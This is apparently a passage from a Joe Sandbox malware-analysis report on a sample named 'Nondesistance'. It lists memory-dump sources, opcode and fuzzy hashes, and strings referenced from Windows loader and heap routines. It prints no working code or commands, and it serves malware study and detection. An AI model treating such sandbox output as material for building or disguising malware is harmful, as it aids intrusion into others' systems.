                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                  • API String ID: 0-1239276146
                                                                                                  • Opcode ID: 2644910c1396cd62d7274405c527786f93d6c9bb3c73ae2e8f9e7f85f16a50e8
                                                                                                  • Instruction ID: ddeec0fdc29d002f59b14ffdb5cb74ad431b617dfed4a0e2ebadca4a07c4e263
                                                                                                  • Opcode Fuzzy Hash: 2644910c1396cd62d7274405c527786f93d6c9bb3c73ae2e8f9e7f85f16a50e8
                                                                                                  • Instruction Fuzzy Hash: 11A17A7990132D9FDB24CE64C884BA9B7B0BF58368F5045EAD808E7295DB709F81CF90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}M2
                                                                                                  • API String ID: 0-624072958
                                                                                                  • Opcode ID: 4a3ec16f5347ec1e94edefb40fee7bf2ab1f3bbe0c0ba87063218a0fa9baf3ea
                                                                                                  • Instruction ID: 599f8f758b5ac5bb82a93a24d77d644f03a94f2cb176884206f65ffce0949190
                                                                                                  • Opcode Fuzzy Hash: 4a3ec16f5347ec1e94edefb40fee7bf2ab1f3bbe0c0ba87063218a0fa9baf3ea
                                                                                                  • Instruction Fuzzy Hash: F9817A71619340AFE711CB24C984B6ABBE8FF94754F404969F988DB290EFB4DE04CB52
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LUL2$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                  • API String ID: 0-302139221
                                                                                                  Strings
                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32550DEC
                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32550E2F
                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32550E72
                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32550EB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                  • API String ID: 0-1468400865
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                  • API String ID: 0-1391187441
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eR2
                                                                                                  • API String ID: 0-2729309950
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                  • API String ID: 0-1168191160
                                                                                                  Strings
                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 324F1648
                                                                                                  • HEAP[%wZ]: , xrefs: 324F1632
                                                                                                  • HEAP: , xrefs: 324F14B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-3178619729
                                                                                                  Strings
                                                                                                  • RTL: Re-Waiting, xrefs: 32560128
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 325600C7
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 325600F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                  • API String ID: 0-2474120054
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                  • API String ID: 0-2391371766
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                  • API String ID: 0-2779062949
                                                                                                  Strings
                                                                                                  • TargetNtPath, xrefs: 325CB3AF
                                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 325CB3AA
                                                                                                  • GlobalizationUserSettings, xrefs: 325CB3B4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                  • API String ID: 0-505981995
                                                                                                  Strings
                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3254E455
                                                                                                  • HEAP[%wZ]: , xrefs: 3254E435
                                                                                                  • HEAP: , xrefs: 3254E442
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                  • API String ID: 0-1340214556
                                                                                                  Strings
                                                                                                  • HEAP[%wZ]: , xrefs: 3259D792
                                                                                                  • HEAP: , xrefs: 3259D79F
                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3259D7B2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                  • API String ID: 0-3815128232
                                                                                                  Strings
                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 324FA229
                                                                                                  • @SL2, xrefs: 324FA268
                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 324FA21B
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @SL2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                  • API String ID: 0-2018493835
                                                                                                  Strings
                                                                                                  • GlobalFlag, xrefs: 3257B30F
                                                                                                  • @, xrefs: 3257B2F0
                                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3257B2B2
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                  • API String ID: 0-4192008846
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$@
                                                                                                  • API String ID: 0-149943524
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Legacy$UEFI
                                                                                                  • API String ID: 2994545307-634100481
                                                                                                  Strings
                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 325CB5C4
                                                                                                  • RedirectedKey, xrefs: 325CB60E
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                  • API String ID: 0-1388552009
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $$$
                                                                                                  • API String ID: 3446177414-233714265
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                  • API String ID: 0-118005554
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: N2$ N2
                                                                                                  • API String ID: 0-1487462276
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local\$@
                                                                                                  • API String ID: 0-380025441
                                                                                                  Strings
                                                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 3256289A
                                                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3256289F
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                  • API String ID: 0-2653619699
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: MUI
                                                                                                  • API String ID: 0-1339004836
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @[^2@[^2
                                                                                                  • API String ID: 0-2535103134
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #%u
                                                                                                  • API String ID: 0-232158463
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0h^2
                                                                                                  • API String ID: 0-2068094079
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryHash
                                                                                                  • API String ID: 0-2202222882
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: verifier.dll
                                                                                                  • API String ID: 0-3265496382
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #
                                                                                                  • API String ID: 0-1885708031
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Flst
                                                                                                  • API String ID: 0-2374792617
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryName
                                                                                                  • API String ID: 0-215506332
                                                                                                  • Opcode ID: 2205e4984f8b2a49734cf86ddea2e223a06c318ba1453ce44c58a6554a4811bd
                                                                                                  • Instruction ID: 11f9a16c2674646403a6ba018a35644a13c2e524aa1c7aaa80f1e670db3ea5e7
                                                                                                  • Opcode Fuzzy Hash: 2205e4984f8b2a49734cf86ddea2e223a06c318ba1453ce44c58a6554a4811bd
                                                                                                  • Instruction Fuzzy Hash: A9C145B1901245EFDB15CFA9C850A9EBBF4FB88744F10442EE51AEB350EB35AA01CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                  • Instruction ID: 521268c34f38edfae0b5825efe3256a014969abe4b606b2b2fda890278eba3d5
                                                                                                  • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                  • Instruction Fuzzy Hash: FEB11372600745AFEB15CFA5C850BAEBBF6AF84304F648559D952DB280DB70EF41CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4032186151f5f6de039dd01a313ce5849e298e1728ea332eb6eee8cf0232ccff
                                                                                                  • Instruction ID: 247b2790b91e2af3084991971ce78d71ed875e95c577cd9217225adfa05bf31a
                                                                                                  • Opcode Fuzzy Hash: 4032186151f5f6de039dd01a313ce5849e298e1728ea332eb6eee8cf0232ccff
                                                                                                  • Instruction Fuzzy Hash: E7C149741083409FE364CF14C494B9BBBE4BF88744F50895EE9898B390EBB5E644CF92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fa5792a6390ccf330a4ed0230d04cf00b8df14801a39471e12197a24ac52fd41
                                                                                                  • Instruction ID: 956c48e38c292ec9b47df8e14283e5b134dca930fd78c5219ac60514db757817
                                                                                                  • Opcode Fuzzy Hash: fa5792a6390ccf330a4ed0230d04cf00b8df14801a39471e12197a24ac52fd41
                                                                                                  • Instruction Fuzzy Hash: 99B16074A002658BEB64CF65C890BA9B7F5EF44745F40C5EAD90AE7340EB709EC5CB20
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f75fab8d69da093f2fc2638555f3000c5d70d11a98fff184843a70245733d2c8
                                                                                                  • Instruction ID: 1b26c531f18377ab585a5d77efa5ae39bbc83ce9c10bd503097a1bc9aadc9f9a
                                                                                                  • Opcode Fuzzy Hash: f75fab8d69da093f2fc2638555f3000c5d70d11a98fff184843a70245733d2c8
                                                                                                  • Instruction Fuzzy Hash: 4AA10376B12715DFEB15CFA5C880BAABBB5FF44359F405029EA8597280DB74EA01CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 81eb3837bd9eb1892748d91859f1729fbeaf5f8a7ace73ba9d2b80aaa6a4ab90
                                                                                                  • Instruction ID: 28120d7c2b0fad805e0d8e41b4c36e3a71714c14c81a3ceeba28efd1e6481a54
                                                                                                  • Opcode Fuzzy Hash: 81eb3837bd9eb1892748d91859f1729fbeaf5f8a7ace73ba9d2b80aaa6a4ab90
                                                                                                  • Instruction Fuzzy Hash: 14A1EDB2621621EFD311CF54C880F5ABBE5FF88749F804928E586EB650E774EE41CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f35c696321885d52d76faf8b3f0ab466e7b206550a1936509f1fb97a99babe2b
                                                                                                  • Instruction ID: 8f0c215214c9fad988940be942ec3f47e710afd331eeb2d33f160cf39cb3bb0b
                                                                                                  • Opcode Fuzzy Hash: f35c696321885d52d76faf8b3f0ab466e7b206550a1936509f1fb97a99babe2b
                                                                                                  • Instruction Fuzzy Hash: E8910475A517158BE7148B68CC80BAE7BA1EF88794F61C46AEC05DB380DB389B41CFD1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3dceb400658626d1ffdadf1d54eb47150d47cae82b39293915a64a2dc31cb1b
                                                                                                  • Instruction ID: 5f0ab57af47f82be799f97c5f579765d521f88b769d687c6bc9802cc37cde09f
                                                                                                  • Opcode Fuzzy Hash: a3dceb400658626d1ffdadf1d54eb47150d47cae82b39293915a64a2dc31cb1b
                                                                                                  • Instruction Fuzzy Hash: FEB17DB9905306EFDB18DF18C580798B7B0FB98358F60455AEC219B391DB72DA82CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ddeff4d869728fe803ec400882562510f0c59737f3dc7827649a7dde8dd69146
                                                                                                  • Instruction ID: c90abbe66b9d28c8a4ede8263fac1689d973a1e0e6c8dd89564b412aa718a002
